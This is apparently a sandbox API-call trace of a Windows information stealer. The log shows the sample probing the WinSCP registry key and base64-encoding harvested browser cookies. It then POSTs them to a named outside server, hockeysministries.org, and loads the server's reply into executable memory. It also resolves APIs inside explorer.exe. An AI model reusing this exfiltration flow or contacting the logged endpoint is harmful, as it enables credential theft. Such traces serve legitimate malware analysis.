1 [0164.054] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x2 | out: plibNewPosition=0x2) returned 0x0 [0164.054] IStream:SetSize (This=0x9043c0, libNewSize=0x2ff) returned 0x0 [0164.054] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x2ff, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0164.054] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x2 | out: plibNewPosition=0x2) returned 0x0 [0164.054] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0164.054] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2dfadc*=0x0, cb=0x4, pcbWritten=0x2dfad0 | out: pcbWritten=0x2dfad0*=0x4) returned 0x0 [0164.054] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2dfae8*=0xc, cb=0x2, pcbWritten=0x2dfad0 | out: pcbWritten=0x2dfad0*=0x2) returned 0x0 [0164.054] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2dfaec*=0x0, cb=0x2, pcbWritten=0x2dfad0 | out: pcbWritten=0x2dfad0*=0x2) returned 0x0 [0164.054] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Martin Prikryl", phkResult=0x2dfac4 | out: phkResult=0x2dfac4*=0x0) returned 0x2 [0164.054] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Martin Prikryl", phkResult=0x2dfac4 | out: phkResult=0x2dfac4*=0x0) returned 0x2 [0164.054] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x2 | out: plibNewPosition=0x2) returned 0x0 [0164.055] IStream:SetSize (This=0x9043c0, libNewSize=0x2ff) returned 0x0 [0164.055] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x2ff, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0164.055] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x2 | out: plibNewPosition=0x2) returned 0x0 [0164.055] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x2 | out: plibNewPosition=0x2) returned 0x0 [0164.055] GetHGlobalFromStream (in: pstm=0x9043c0, phglobal=0x2dfafc | out: phglobal=0x2dfafc) returned 0x0 [0164.055] GlobalLock (hMem=0xe0004) returned 0x924fb0 [0164.055] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x2 | out: plibNewPosition=0x2) returned 0x0 [0164.055] GetProcessHeap () returned 0x8e0000 [0164.055] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x2ff) returned 0x9252c8 [0164.055] RtlMoveMemory (in: Destination=0x9252c8, Source=0x924fb0, Length=0x2ff | out: Destination=0x9252c8) [0164.055] GlobalUnlock (hMem=0xe0004) returned 0 [0164.055] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x2 | out: plibNewPosition=0x2) returned 0x0 [0164.070] CryptBinaryToStringA (in: pbBinary=0x9252c8, cbBinary=0x2ff, dwFlags=0x1, pszString=0x0, pcchString=0x2dfaec | out: pszString=0x0, pcchString=0x2dfaec) returned 1 [0164.071] GetProcessHeap () returned 0x8e0000 [0164.071] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x422) returned 0x9255d0 [0164.071] CryptBinaryToStringA (in: pbBinary=0x9252c8, cbBinary=0x2ff, dwFlags=0x1, pszString=0x9255d0, pcchString=0x2dfaec | out: pszString="/wIAAAIAAAAHAAAAQ09PS0lFUwcAAABDT09LSUVT3QIAAC5tb3ppbGxhLm9yZwlU\r\nUlVFCS8JRkFMU0UJMTYwNDY1MTQyNwlfZ2EJR0ExLjIuMjY3NzA2MzY5LjE0OTY2\r\nMzAyNzAKLm1vemlsbGEub3JnCVRSVUUJLwlGQUxTRQkxNjA0NjUxNDI3CV9naWQJ\r\nR0ExLjIuNjUyMjU2MzQxLjE0OTY2MzAyNzAKLm1vemlsbGEub3JnCVRSVUUJLwlG\r\nQUxTRQkxNjA0NjUxNDI3CV9nYXRfVUEtMzYxMTYzMjEtMQkxCi5qYXZhLmNvbQlU\r\nUlVFCS8JRkFMU0UJMTYwNDY1MTQyNwlzX25yCTE0OTc1NjYwNTA2MTYKLmphdmEu\r\nY29tCVRSVUUJLwlGQUxTRQkxNjA0NjUxNDI3CWdwTmFtZQlqYXZhYyUzQVZlcmlm\r\neSUzQUluc3RhbGxlZF9KUkVfSG9tZXBhZ2UKLmphdmEuY29tCVRSVUUJLwlGQUxT\r\nRQkxNjA0NjUxNDI3CWdwQ2hhbm5lbAlqYXZhYyUzQVZlcmlmeQouamF2YS5jb20J\r\nVFJVRQkvCUZBTFNFCTE2MDQ2NTE0MjcJZ3BTZXJ2ZXIJamF2YS5jb20KLm9yYWNs\r\nZS4xMTIuMm83Lm5ldAlUUlVFCS8JRkFMU0UJMTYwNDY1MTQyNwlzX3ZpCVtDU112\r\nMXwyQ0ExQ0MwMjA1MDMyM0E0LTQwMDAxMTlBODAwMDhCNDlbQ0VdCnByZWZtZ3It\r\nY29va2llLnRydXN0ZS1zdmMubmV0CVRSVUUJLwlGQUxTRQkxNjA0NjUxNDI3CWNv\r\nb2tpZV8zcmRwYXJ0eQllbmFibGVkCmNvbnNlbnQtcHJlZi50cnVzdGUuY29tCVRS\r\nVUUJLwlGQUxTRQkxNjA0NjUxNDI3CXRva2VuX3Rlc3QJRnJpIEp1biAxNiAyMDE3\r\nIDA4OjM0OjEyIEdNVCsxMDAwIChBVVMgRWFzdGVybiBTdGFuZGFyZCBUaW1lKQo=\r\n", pcchString=0x2dfaec) returned 1 [0164.072] lstrlenA (lpString="/wIAAAIAAAAHAAAAQ09PS0lFUwcAAABDT09LSUVT3QIAAC5tb3ppbGxhLm9yZwlU\r\nUlVFCS8JRkFMU0UJMTYwNDY1MTQyNwlfZ2EJR0ExLjIuMjY3NzA2MzY5LjE0OTY2\r\nMzAyNzAKLm1vemlsbGEub3JnCVRSVUUJLwlGQUxTRQkxNjA0NjUxNDI3CV9naWQJ\r\nR0ExLjIuNjUyMjU2MzQxLjE0OTY2MzAyNzAKLm1vemlsbGEub3JnCVRSVUUJLwlG\r\nQUxTRQkxNjA0NjUxNDI3CV9nYXRfVUEtMzYxMTYzMjEtMQkxCi5qYXZhLmNvbQlU\r\nUlVFCS8JRkFMU0UJMTYwNDY1MTQyNwlzX25yCTE0OTc1NjYwNTA2MTYKLmphdmEu\r\nY29tCVRSVUUJLwlGQUxTRQkxNjA0NjUxNDI3CWdwTmFtZQlqYXZhYyUzQVZlcmlm\r\neSUzQUluc3RhbGxlZF9KUkVfSG9tZXBhZ2UKLmphdmEuY29tCVRSVUUJLwlGQUxT\r\nRQkxNjA0NjUxNDI3CWdwQ2hhbm5lbAlqYXZhYyUzQVZlcmlmeQouamF2YS5jb20J\r\nVFJVRQkvCUZBTFNFCTE2MDQ2NTE0MjcJZ3BTZXJ2ZXIJamF2YS5jb20KLm9yYWNs\r\nZS4xMTIuMm83Lm5ldAlUUlVFCS8JRkFMU0UJMTYwNDY1MTQyNwlzX3ZpCVtDU112\r\nMXwyQ0ExQ0MwMjA1MDMyM0E0LTQwMDAxMTlBODAwMDhCNDlbQ0VdCnByZWZtZ3It\r\nY29va2llLnRydXN0ZS1zdmMubmV0CVRSVUUJLwlGQUxTRQkxNjA0NjUxNDI3CWNv\r\nb2tpZV8zcmRwYXJ0eQllbmFibGVkCmNvbnNlbnQtcHJlZi50cnVzdGUuY29tCVRS\r\nVUUJLwlGQUxTRQkxNjA0NjUxNDI3CXRva2VuX3Rlc3QJRnJpIEp1biAxNiAyMDE3\r\nIDA4OjM0OjEyIEdNVCsxMDAwIChBVVMgRWFzdGVybiBTdGFuZGFyZCBUaW1lKQo=\r\n") returned 1056 [0164.072] GetProcessHeap () returned 0x8e0000 [0164.072] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x460) returned 0x925a00 [0164.072] lstrcatA (in: lpString1="", lpString2="604954A450752B96B72CF2C4FA84486C9C354B42" | out: lpString1="604954A450752B96B72CF2C4FA84486C9C354B42") returned="604954A450752B96B72CF2C4FA84486C9C354B42" [0164.072] lstrcatA (in: lpString1="", lpString2="/wIAAAIAAAAHAAAAQ09PS0lFUwcAAABDT09LSUVT3QIAAC5tb3ppbGxhLm9yZwlU\r\nUlVFCS8JRkFMU0UJMTYwNDY1MTQyNwlfZ2EJR0ExLjIuMjY3NzA2MzY5LjE0OTY2\r\nMzAyNzAKLm1vemlsbGEub3JnCVRSVUUJLwlGQUxTRQkxNjA0NjUxNDI3CV9naWQJ\r\nR0ExLjIuNjUyMjU2MzQxLjE0OTY2MzAyNzAKLm1vemlsbGEub3JnCVRSVUUJLwlG\r\nQUxTRQkxNjA0NjUxNDI3CV9nYXRfVUEtMzYxMTYzMjEtMQkxCi5qYXZhLmNvbQlU\r\nUlVFCS8JRkFMU0UJMTYwNDY1MTQyNwlzX25yCTE0OTc1NjYwNTA2MTYKLmphdmEu\r\nY29tCVRSVUUJLwlGQUxTRQkxNjA0NjUxNDI3CWdwTmFtZQlqYXZhYyUzQVZlcmlm\r\neSUzQUluc3RhbGxlZF9KUkVfSG9tZXBhZ2UKLmphdmEuY29tCVRSVUUJLwlGQUxT\r\nRQkxNjA0NjUxNDI3CWdwQ2hhbm5lbAlqYXZhYyUzQVZlcmlmeQouamF2YS5jb20J\r\nVFJVRQkvCUZBTFNFCTE2MDQ2NTE0MjcJZ3BTZXJ2ZXIJamF2YS5jb20KLm9yYWNs\r\nZS4xMTIuMm83Lm5ldAlUUlVFCS8JRkFMU0UJMTYwNDY1MTQyNwlzX3ZpCVtDU112\r\nMXwyQ0ExQ0MwMjA1MDMyM0E0LTQwMDAxMTlBODAwMDhCNDlbQ0VdCnByZWZtZ3It\r\nY29va2llLnRydXN0ZS1zdmMubmV0CVRSVUUJLwlGQUxTRQkxNjA0NjUxNDI3CWNv\r\nb2tpZV8zcmRwYXJ0eQllbmFibGVkCmNvbnNlbnQtcHJlZi50cnVzdGUuY29tCVRS\r\nVUUJLwlGQUxTRQkxNjA0NjUxNDI3CXRva2VuX3Rlc3QJRnJpIEp1biAxNiAyMDE3\r\nIDA4OjM0OjEyIEdNVCsxMDAwIChBVVMgRWFzdGVybiBTdGFuZGFyZCBUaW1lKQo=\r\n" | out: lpString1="/wIAAAIAAAAHAAAAQ09PS0lFUwcAAABDT09LSUVT3QIAAC5tb3ppbGxhLm9yZwlU\r\nUlVFCS8JRkFMU0UJMTYwNDY1MTQyNwlfZ2EJR0ExLjIuMjY3NzA2MzY5LjE0OTY2\r\nMzAyNzAKLm1vemlsbGEub3JnCVRSVUUJLwlGQUxTRQkxNjA0NjUxNDI3CV9naWQJ\r\nR0ExLjIuNjUyMjU2MzQxLjE0OTY2MzAyNzAKLm1vemlsbGEub3JnCVRSVUUJLwlG\r\nQUxTRQkxNjA0NjUxNDI3CV9nYXRfVUEtMzYxMTYzMjEtMQkxCi5qYXZhLmNvbQlU\r\nUlVFCS8JRkFMU0UJMTYwNDY1MTQyNwlzX25yCTE0OTc1NjYwNTA2MTYKLmphdmEu\r\nY29tCVRSVUUJLwlGQUxTRQkxNjA0NjUxNDI3CWdwTmFtZQlqYXZhYyUzQVZlcmlm\r\neSUzQUluc3RhbGxlZF9KUkVfSG9tZXBhZ2UKLmphdmEuY29tCVRSVUUJLwlGQUxT\r\nRQkxNjA0NjUxNDI3CWdwQ2hhbm5lbAlqYXZhYyUzQVZlcmlmeQouamF2YS5jb20J\r\nVFJVRQkvCUZBTFNFCTE2MDQ2NTE0MjcJZ3BTZXJ2ZXIJamF2YS5jb20KLm9yYWNs\r\nZS4xMTIuMm83Lm5ldAlUUlVFCS8JRkFMU0UJMTYwNDY1MTQyNwlzX3ZpCVtDU112\r\nMXwyQ0ExQ0MwMjA1MDMyM0E0LTQwMDAxMTlBODAwMDhCNDlbQ0VdCnByZWZtZ3It\r\nY29va2llLnRydXN0ZS1zdmMubmV0CVRSVUUJLwlGQUxTRQkxNjA0NjUxNDI3CWNv\r\nb2tpZV8zcmRwYXJ0eQllbmFibGVkCmNvbnNlbnQtcHJlZi50cnVzdGUuY29tCVRS\r\nVUUJLwlGQUxTRQkxNjA0NjUxNDI3CXRva2VuX3Rlc3QJRnJpIEp1biAxNiAyMDE3\r\nIDA4OjM0OjEyIEdNVCsxMDAwIChBVVMgRWFzdGVybiBTdGFuZGFyZCBUaW1lKQo=\r\n") returned="/wIAAAIAAAAHAAAAQ09PS0lFUwcAAABDT09LSUVT3QIAAC5tb3ppbGxhLm9yZwlU\r\nUlVFCS8JRkFMU0UJMTYwNDY1MTQyNwlfZ2EJR0ExLjIuMjY3NzA2MzY5LjE0OTY2\r\nMzAyNzAKLm1vemlsbGEub3JnCVRSVUUJLwlGQUxTRQkxNjA0NjUxNDI3CV9naWQJ\r\nR0ExLjIuNjUyMjU2MzQxLjE0OTY2MzAyNzAKLm1vemlsbGEub3JnCVRSVUUJLwlG\r\nQUxTRQkxNjA0NjUxNDI3CV9nYXRfVUEtMzYxMTYzMjEtMQkxCi5qYXZhLmNvbQlU\r\nUlVFCS8JRkFMU0UJMTYwNDY1MTQyNwlzX25yCTE0OTc1NjYwNTA2MTYKLmphdmEu\r\nY29tCVRSVUUJLwlGQUxTRQkxNjA0NjUxNDI3CWdwTmFtZQlqYXZhYyUzQVZlcmlm\r\neSUzQUluc3RhbGxlZF9KUkVfSG9tZXBhZ2UKLmphdmEuY29tCVRSVUUJLwlGQUxT\r\nRQkxNjA0NjUxNDI3CWdwQ2hhbm5lbAlqYXZhYyUzQVZlcmlmeQouamF2YS5jb20J\r\nVFJVRQkvCUZBTFNFCTE2MDQ2NTE0MjcJZ3BTZXJ2ZXIJamF2YS5jb20KLm9yYWNs\r\nZS4xMTIuMm83Lm5ldAlUUlVFCS8JRkFMU0UJMTYwNDY1MTQyNwlzX3ZpCVtDU112\r\nMXwyQ0ExQ0MwMjA1MDMyM0E0LTQwMDAxMTlBODAwMDhCNDlbQ0VdCnByZWZtZ3It\r\nY29va2llLnRydXN0ZS1zdmMubmV0CVRSVUUJLwlGQUxTRQkxNjA0NjUxNDI3CWNv\r\nb2tpZV8zcmRwYXJ0eQllbmFibGVkCmNvbnNlbnQtcHJlZi50cnVzdGUuY29tCVRS\r\nVUUJLwlGQUxTRQkxNjA0NjUxNDI3CXRva2VuX3Rlc3QJRnJpIEp1biAxNiAyMDE3\r\nIDA4OjM0OjEyIEdNVCsxMDAwIChBVVMgRWFzdGVybiBTdGFuZGFyZCBUaW1lKQo=\r\n" [0164.072] lstrlenA (lpString="http://hockeysministries.org/playoff/chmpion4378/hockey.php") returned 59 [0164.072] lstrlenA (lpString=".bit") returned 4 [0164.072] GetProcessHeap () returned 0x8e0000 [0164.072] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x104) returned 0x925e68 [0164.072] lstrlenA (lpString="http://hockeysministries.org/playoff/chmpion4378/hockey.php") returned 59 [0164.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x90481a, cbMultiByte=60, lpWideCharStr=0x925e68, cchWideChar=120 | out: lpWideCharStr="http://hockeysministries.org/playoff/chmpion4378/hockey.php") returned 60 [0164.072] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x2dfa20 | out: pProxyConfig=0x2dfa20) returned 1 [0164.897] WinHttpOpen (pszAgentW="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x9118b0 [0164.900] WinHttpCrackUrl (in: pwszUrl="http://hockeysministries.org/playoff/chmpion4378/hockey.php", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x2dfa84 | out: lpUrlComponents=0x2dfa84) returned 1 [0164.900] WinHttpConnect (hSession=0x9118b0, pswzServerName="hockeysministries.org", nServerPort=0x50, dwReserved=0x0) returned 0x920688 [0166.852] WinHttpOpenRequest (hConnect=0x920688, pwszVerb="POST", pwszObjectName="/playoff/chmpion4378/hockey.php", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x100) returned 0x921928 [0166.852] GetProcessHeap () returned 0x8e0000 [0166.852] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x105) returned 0x921d60 [0166.852] wsprintfW (in: param_1=0x921d60, param_2="Accept: */*\r\nReferer: %S" | out: param_1="Accept: */*\r\nReferer: http://hockeysministries.org/playoff/chmpion4378/hockey.php") returned 81 [0166.853] WinHttpAddRequestHeaders (hRequest=0x921928, pwszHeaders="Accept: */*\r\nReferer: http://hockeysministries.org/playoff/chmpion4378/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0166.853] VirtualQuery (in: lpAddress=0x921d60, lpBuffer=0x2dfa1c, dwLength=0x1c | out: lpBuffer=0x2dfa1c*(BaseAddress=0x921000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0166.853] GetProcessHeap () returned 0x8e0000 [0166.853] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x921d60 | out: hHeap=0x8e0000) returned 1 [0166.853] WinHttpSendRequest (hRequest=0x921928, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x925a00*, dwOptionalLength=0x45f, dwTotalLength=0x45f, dwContext=0x0) returned 1 [0168.666] WinHttpReceiveResponse (hRequest=0x921928, lpReserved=0x0) returned 1 [0168.666] GetProcessHeap () returned 0x8e0000 [0168.666] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x2800) returned 0x92a008 [0168.666] WinHttpReadData (in: hRequest=0x921928, lpBuffer=0x92a008, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x2dfa7c | out: lpBuffer=0x92a008*, lpdwNumberOfBytesRead=0x2dfa7c*=0x165) returned 1 [0168.666] GetProcessHeap () returned 0x8e0000 [0168.666] RtlReAllocateHeap (Heap=0x8e0000, Flags=0x8, Ptr=0x92a008, Size=0x5000) returned 0x92a008 [0168.666] WinHttpReadData (in: hRequest=0x921928, lpBuffer=0x92a16d, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x2dfa7c | out: lpBuffer=0x92a16d*, lpdwNumberOfBytesRead=0x2dfa7c*=0x0) returned 1 [0168.667] VirtualAlloc (lpAddress=0x0, dwSize=0x165, flAllocationType=0x3000, flProtect=0x40) returned 0x270000 [0168.667] RtlMoveMemory (in: Destination=0x270000, Source=0x92a008, Length=0x165 | out: Destination=0x270000) [0168.667] VirtualQuery (in: lpAddress=0x92a008, lpBuffer=0x2dfa1c, dwLength=0x1c | out: lpBuffer=0x2dfa1c*(BaseAddress=0x92a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.667] GetProcessHeap () returned 0x8e0000 [0168.667] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x92a008 | out: hHeap=0x8e0000) returned 1 [0168.667] WinHttpCloseHandle (hInternet=0x921928) returned 1 [0168.667] WinHttpCloseHandle (hInternet=0x920688) returned 1 [0168.667] WinHttpCloseHandle (hInternet=0x9118b0) returned 1 [0168.668] VirtualQuery (in: lpAddress=0x925e68, lpBuffer=0x2dfa1c, dwLength=0x1c | out: lpBuffer=0x2dfa1c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.668] GetProcessHeap () returned 0x8e0000 [0168.668] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925e68 | out: hHeap=0x8e0000) returned 1 [0168.668] VirtualQuery (in: lpAddress=0x925a00, lpBuffer=0x2dfaa4, dwLength=0x1c | out: lpBuffer=0x2dfaa4*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.668] GetProcessHeap () returned 0x8e0000 [0168.668] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925a00 | out: hHeap=0x8e0000) returned 1 [0168.670] VirtualFree (lpAddress=0x270000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0168.671] VirtualQuery (in: lpAddress=0x9255d0, lpBuffer=0x2dfacc, dwLength=0x1c | out: lpBuffer=0x2dfacc*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.671] GetProcessHeap () returned 0x8e0000 [0168.671] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9255d0 | out: hHeap=0x8e0000) returned 1 [0168.671] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfadc, dwLength=0x1c | out: lpBuffer=0x2dfadc*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.671] GetProcessHeap () returned 0x8e0000 [0168.671] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0168.673] IUnknown:Release (This=0x9043c0) returned 0x0 [0168.673] CoUninitialize () [0168.675] ExitProcess (uExitCode=0x0) Thread: id = 194 os_tid = 0x978 Thread: id = 203 os_tid = 0x944 Thread: id = 206 os_tid = 0x330 Thread: id = 241 os_tid = 0x730 Process: id = "13" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x5b74a000" os_pid = "0x3d0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0xbdc" cmd_line = "C:\\Windows\\explorer.exe" cur_dir = "C:\\Windows\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 193 os_tid = 0x938 [0159.985] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76e30000 [0159.987] GetProcAddress (hModule=0x76e30000, lpProcName="WideCharToMultiByte") returned 0x76e535f0 [0159.987] GetProcAddress (hModule=0x76e30000, lpProcName="LoadLibraryW") returned 0x76e46f80 [0159.987] GetProcAddress (hModule=0x76e30000, lpProcName="GetFileAttributesW") returned 0x76e4bdd0 [0159.988] GetProcAddress (hModule=0x76e30000, lpProcName="ReadFile") returned 0x76e41500 [0159.988] GetProcAddress (hModule=0x76e30000, lpProcName="CreateFileW") returned 0x76e41870 [0159.988] GetProcAddress (hModule=0x76e30000, lpProcName="lstrcatA") returned 0x76e7e110 [0159.988] GetProcAddress (hModule=0x76e30000, lpProcName="MultiByteToWideChar") returned 0x76e45b50 [0159.988] GetProcAddress (hModule=0x76e30000, lpProcName="lstrlenW") returned 0x76e43ec0 [0159.988] GetProcAddress (hModule=0x76e30000, lpProcName="GlobalUnlock") returned 0x76e7e570 [0159.988] GetProcAddress (hModule=0x76e30000, lpProcName="GetPrivateProfileIntW") returned 0x76eb14d0 [0159.988] GetProcAddress (hModule=0x76e30000, lpProcName="RtlMoveMemory") returned 0x76e526d8 [0159.988] GetProcAddress (hModule=0x76e30000, lpProcName="GetCurrentDirectoryW") returned 0x76e4c580 [0159.988] GetProcAddress (hModule=0x76e30000, lpProcName="GetProcAddress") returned 0x76e53690 [0159.988] GetProcAddress (hModule=0x76e30000, lpProcName="VirtualAlloc") returned 0x76e467a0 [0159.988] GetProcAddress (hModule=0x76e30000, lpProcName="FindClose") returned 0x76e4bd60 [0159.989] GetProcAddress (hModule=0x76e30000, lpProcName="SetCurrentDirectoryW") returned 0x76e4cab0 [0159.989] GetProcAddress (hModule=0x76e30000, lpProcName="lstrcmpiW") returned 0x76e41930 [0159.989] GetProcAddress (hModule=0x76e30000, lpProcName="lstrcatW") returned 0x76e7e070 [0159.989] GetProcAddress (hModule=0x76e30000, lpProcName="FindNextFileW") returned 0x76e41910 [0159.989] GetProcAddress (hModule=0x76e30000, lpProcName="CloseHandle") returned 0x76e52f80 [0159.989] GetProcAddress (hModule=0x76e30000, lpProcName="RtlZeroMemory") returned 0x76fa2eb0 [0159.989] GetProcAddress (hModule=0x76e30000, lpProcName="GetPrivateProfileStringW") returned 0x76e36bf0 [0159.989] GetProcAddress (hModule=0x76e30000, lpProcName="GetProcessHeap") returned 0x76e53050 [0159.989] GetProcAddress (hModule=0x76e30000, lpProcName="VirtualFree") returned 0x76e41260 [0159.989] GetProcAddress (hModule=0x76e30000, lpProcName="GlobalLock") returned 0x76e7e760 [0159.989] GetProcAddress (hModule=0x76e30000, lpProcName="HeapFree") returned 0x76e53070 [0159.989] GetProcAddress (hModule=0x76e30000, lpProcName="HeapAlloc") returned 0x76fa33a0 [0159.990] GetProcAddress (hModule=0x76e30000, lpProcName="VirtualQuery") returned 0x76e4bd40 [0159.990] GetProcAddress (hModule=0x76e30000, lpProcName="lstrlenA") returned 0x76e4caf0 [0159.990] GetProcAddress (hModule=0x76e30000, lpProcName="FindFirstFileW") returned 0x76e4bd80 [0159.990] GetProcAddress (hModule=0x76e30000, lpProcName="GetFileSize") returned 0x76e3f9d0 [0159.990] GetProcAddress (hModule=0x76e30000, lpProcName="HeapReAlloc") returned 0x76f83f20 [0159.990] GetProcAddress (hModule=0x76e30000, lpProcName="GetPrivateProfileSectionNamesW") returned 0x76e366f0 [0159.990] GetProcAddress (hModule=0x76e30000, lpProcName="ExitProcess") returned 0x76f740f0 [0159.990] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x7fefdbf0000 [0159.990] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="RegOpenKeyExW") returned 0x7fefdc106f0 [0159.990] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="RegCreateKeyExW") returned 0x7fefdc0b520 [0159.990] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="RegCloseKey") returned 0x7fefdc10710 [0159.991] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="RegEnumKeyExW") returned 0x7fefdc0c310 [0159.991] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="RegOpenKeyW") returned 0x7fefdc03280 [0159.991] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="RegQueryValueExW") returned 0x7fefdc0c2d0 [0159.991] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x7fefd080000 [0160.077] GetProcAddress (hModule=0x7fefd080000, lpProcName="CryptStringToBinaryA") returned 0x7fefd0ce59c [0160.077] GetProcAddress (hModule=0x7fefd080000, lpProcName="CryptBinaryToStringA") returned 0x7fefd0b4220 [0160.077] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x7fefc5b0000 [0160.082] GetProcAddress (hModule=0x7fefc5b0000, lpProcName="DnsFree") returned 0x7fefc5b1e74 [0160.082] GetProcAddress (hModule=0x7fefc5b0000, lpProcName="DnsQuery_W") returned 0x7fefc5c01b0 [0160.082] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x76f50000 [0160.082] GetProcAddress (hModule=0x76f50000, lpProcName="NtUnmapViewOfSection") returned 0x76fa15b0 [0160.082] GetProcAddress (hModule=0x76f50000, lpProcName="RtlComputeCrc32") returned 0x76f5c7b0 [0160.082] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x7fefe2b0000 [0160.083] GetProcAddress (hModule=0x7fefe2b0000, lpProcName="CoUninitialize") returned 0x7fefe2d1314 [0160.083] GetProcAddress (hModule=0x7fefe2b0000, lpProcName="CoInitialize") returned 0x7fefe2ca51c [0160.083] GetProcAddress (hModule=0x7fefe2b0000, lpProcName="CreateStreamOnHGlobal") returned 0x7fefe395fb0 [0160.083] GetProcAddress (hModule=0x7fefe2b0000, lpProcName="GetHGlobalFromStream") returned 0x7fefe379d20 [0160.083] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x7fefe4c0000 [0160.083] GetProcAddress (hModule=0x7fefe4c0000, lpProcName="SHGetFolderPathW") returned 0x7fefe543ba4 [0160.083] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x7fefdb70000 [0160.083] GetProcAddress (hModule=0x7fefdb70000, lpProcName="StrStrIA") returned 0x7fefdb75a1c [0160.084] GetProcAddress (hModule=0x7fefdb70000, lpProcName="StrRChrIW") returned 0x7fefdb9fe0c [0160.084] GetProcAddress (hModule=0x7fefdb70000, lpProcName="StrStrIW") returned 